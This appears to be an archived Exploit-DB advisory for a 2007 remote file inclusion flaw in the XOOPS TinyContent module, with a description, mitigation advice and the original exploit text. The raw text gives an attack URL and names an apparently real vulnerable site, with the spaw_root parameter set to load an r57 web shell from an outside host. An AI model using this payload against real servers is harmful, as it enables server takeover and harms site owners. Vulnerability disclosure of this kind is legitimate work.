XOOPS Module TinyContent Remote File Inclusion

vendor:

XOOPS Module TinyContent

by:

Sp[L]o1T

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: XOOPS Module TinyContent

Affected Version From: < 1.5

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

XOOPS Module TinyContent Remote File Inclusion

This vulnerability allows an attacker to include remote files on the server by manipulating a parameter in the URL. The specific vulnerable file is 'spaw_control.class.php' located in the 'admin/spaw' directory of the TinyContent module in XOOPS. By setting the 'spaw_root' parameter to a remote file location, the attacker can execute malicious code on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update the TinyContent module to version 1.5 or above. Additionally, it is advised to sanitize user input and validate file paths before including them in the code.

Source

Exploit-DB raw data:

~~~~~~~~~~~~~~~~~~~~~~~
XOOPS Module TinyContent Remote File Inclusion
version: < 1.5
source: http://prdownloads.sourceforge.net/xoops/xoops2-mod-tinycontent_1_5.zip
~~~~~~~~~~~~~~~~~~~~~~
Discovered by Sp[L]o1T from hTTP://hacking.3Xforum.Ro
~~~~~~~~~~~~~~~~~~~~~~
BUG:
http://www.site.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt?

Vuln site:
http://www.wiscpsa.org/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ekin0x.com/r57.txt?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Shoutz t0: all members of Hacking[dot]3xforum[dot]ro ,V1rg0 ,Str0ke
Contact: splo1t[at]yahoo[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# milw0rm.com [2007-06-12]